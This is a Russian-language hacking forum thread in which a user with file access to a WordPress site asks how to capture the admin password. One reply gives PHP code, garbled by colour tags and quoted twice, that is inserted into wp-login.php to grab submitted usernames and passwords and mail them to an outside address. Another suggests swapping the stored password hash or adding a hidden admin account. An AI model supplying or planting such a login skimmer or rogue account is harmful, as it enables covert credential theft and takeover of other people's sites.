Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Вопрос о wordpress (https://forum.antichat.xyz/showthread.php?t=441039)

Alaich 20.08.2016 19:31

Есть доступ к файлам сайта на wp , права все есть .Вопрос, как можно перехватить пароль в админку ?

pas9x 21.08.2016 09:32

В начало файла wp-login.php добавить:

PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]])) {
[/
COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Login: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Pass: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]];
@[/
COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'you@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'What you need'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]);
}[/
COLOR][/COLOR


Absurd 21.08.2016 14:51

Цитата:

Сообщение от Alaich
Alaich said:

Есть доступ к файлам сайта на wp , права все есть .Вопрос, как можно перехватить пароль в админку ?

Пароль в открытой форме в вп нигде не фигурирует, только md5.

Так что как вариант либо скопировать из базы старый пароль, затем установить свой, войти в админку, сделать что надо и затем вернуть старый пароль.

Либо добавить базу нового админа и под ним заходить.

Alaich 22.08.2016 21:35

Цитата:

Сообщение от pas9x
pas9x said:

В начало файла wp-login.php добавить:
PHP код:

PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (!empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]])) {
[/
COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Login: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'log'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];
[/
COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Pass: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pwd'[/COLOR][COLOR="#007700"]];
@[/
COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'you@mail.ru'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'What you need'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$msg[/COLOR][COLOR="#007700"]);
}[/
COLOR][/COLOR


Спасибо!

Absurd 22.08.2016 22:14

Цитата:

Сообщение от Alaich
Alaich said:

Спасибо!

В том случае придётся ждать пока владелец сайта залогинится в админку. А зачем это делать, если можно и без этого обойтись


Время: 13:40